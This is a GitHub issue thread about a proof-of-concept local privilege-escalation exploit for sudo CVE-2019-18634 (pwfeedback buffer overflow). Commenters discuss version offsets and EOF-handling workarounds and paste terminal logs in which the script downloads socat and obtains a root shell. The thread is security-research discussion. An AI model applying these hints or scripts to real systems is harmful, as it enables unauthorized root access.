Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Maybe not work with some sudo versions? #1

Open
brant-ruan opened this issue Feb 7, 2020 · 9 comments
Open

Maybe not work with some sudo versions? #1

brant-ruan opened this issue Feb 7, 2020 · 9 comments

Comments

@brant-ruan
Copy link

Congrats for amazing work :P

However I have tested this script (the latest commit up to now) on Ubuntu 16.04 with sudo 1.8.16 and Kali with sudo 1.8.29, while none succeeded (I see your sudo version in the video within your post is 1.8.25).

Is there any special step to configure to generate&run the exp?

I have read your post but cannot understand it well... Maybe I should learn a lot more.

Anyway, thx :)
@k3an3
Copy link

k3an3 commented Feb 7, 2020

Also confirming it doesn't work on 1.8.27 and 1.8.29, haven't debugged in depth. I have a separate working PoC; offsets tend to vary across sudo versions.

@Plazmaz
Copy link
Owner

Plazmaz commented Feb 7, 2020

It seems pretty likely the offsets differ between versions. To remedy this you'd want to look at the BSS section and see at what data is present between the end of the buffer and the start of the user struct. If someone wants to make this more compatible I'd be willing to accept a PR, but this was intended more as a PoC, not a fully compatible tool.

@Plazmaz
Copy link
Owner

Plazmaz commented Feb 7, 2020

That being said, I will probably add some warning about this in the README, as it's certainly a gotcha, and there's probably a more resilient way of doing this.

@saleemrashid
Copy link

The offsets on Ubuntu 18.04 (Sudo 1.8.25p1) and 20.04 (Sudo 1.8.29) are the same, but this PoC will not work unmodified because Sudo introduced special EOF handling. The EOF character, also known as Ctrl-D, is 0x04 which is inconveniently the same byte you're writing to tgetpass_flags. There are a few possible workarounds for this.

@Plazmaz
Copy link
Owner

Plazmaz commented Feb 7, 2020

Oh interesting. I hadn't looked into it too much. I appreciate the information, and remember seeing some information around EOF handling changes. I will probably take a look at it when I get some more time. Thanks!

@saleemrashid
Copy link

You can take a look at the workaround I used in my exploit, but it unfortunately won't be applicable to your exploit. Though I do know another simple trick that should work for you 😜

@Plazmaz
Copy link
Owner

Plazmaz commented Feb 7, 2020

Cool, appreciate the hints! I'll need to dig into it some more. My first rough guess would be something around changing EOL settings for the tty, but it may be simpler than that.

@bcoles
Copy link

bcoles commented Feb 7, 2020
edited

Tested successfully on a couple of systems.

Linux Mint 19.3 with sudo 1.8.21p2 :

test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ id
uid=1001(test) gid=1001(test) groups=1001(test)
test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
test@linux-mint-19-3-amd64:~/Desktop/CVE-2019-18634$ ./self-contained.sh 
[sudo] password for test: 
Sorry, try again.
Sorry, try again.
sudo: 2 incorrect password attempts
Exploiting!
root@linux-mint-19-3-amd64:/home/test/Desktop/CVE-2019-18634# id
uid=0(root) gid=1001(test) groups=1001(test)

Linux Mint 19.2 with sudo 1.8.21p2 :

user@linux-mint-19-2:~/Desktop/CVE-2019-18634$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
user@linux-mint-19-2:~/Desktop/CVE-2019-18634$ ./self-contained.sh 
--2020-02-08 10:42:06--  https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.192.133, 151.101.128.133, 151.101.64.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.192.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: 'socat’

socat                                                       100%[=========================================================================================================================================>] 366.38K  --.-KB/s    in 0.03s   

2020-02-08 10:42:07 (10.9 MB/s) - 'socat’ saved [375176/375176]

[sudo] password for user: 
Sorry, try again.
Sorry, try again.
sudo: 2 incorrect password attempts
Exploiting!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/CVE-2019-18634# id
uid=0(root) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare)
root@linux-mint-19-2:/home/user/Desktop/CVE-2019-18634#

@0xF41
Copy link

0xF41 commented Dec 26, 2020

On ubuntu 18.04, it seems that this exploit is patched with the security fix of sudo version 1.8.21p2-3ubuntu1.2. A downgrade of the sudo version to 1.8.21p2-3ubuntu1 is required for this exploit/script to work

Ubuntu 18.04:

root@ubuntu:~# lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 18.04.4 LTS
Release:	18.04
Codename:	bionic
root@ubuntu:~# uname -a
Linux ubuntu 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# dpkg -l | grep sudo
ii  gnome-sudoku                               1:3.28.0-1                                      amd64        Sudoku puzzle game for GNOME
ii  sudo                                       1.8.21p2-3ubuntu1                               amd64        Provide limited super user privileges to specific users
root@ubuntu:~# sudo -l
Matching Defaults entries for root on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, pwfeedback

User root may run the following commands on ubuntu:
    (ALL : ALL) ALL
root@ubuntu:~# su administrator
administrator@ubuntu:/root$ cd ~/CVE-2019-18634/
administrator@ubuntu:~/CVE-2019-18634$ ls
README.md  self-contained.sh  src
administrator@ubuntu:~/CVE-2019-18634$ ./self-contained.sh 
--2020-12-25 19:43:28--  https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                                    100%[==================================================================================>] 366.38K  2.29MB/s    in 0.2s    

2020-12-25 19:43:28 (2.29 MB/s) - ‘socat’ saved [375176/375176]

/usr/bin/ld: cannot open output file /tmp/pipe: Permission denied
collect2: error: ld returned 1 exit status
[sudo] password for administrator: 
Sorry, try again.
sudo: 1 incorrect password attempt
Exploiting!
root@ubuntu:/home/administrator/CVE-2019-18634# whoami
root
root@ubuntu:/home/administrator/CVE-2019-18634# id
uid=0(root) gid=1001(administrator) groups=1001(administrator)
root@ubuntu:/home/administrator/CVE-2019-18634#

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
6 participants
@bcoles @Plazmaz @k3an3 @brant-ruan @saleemrashid @0xF41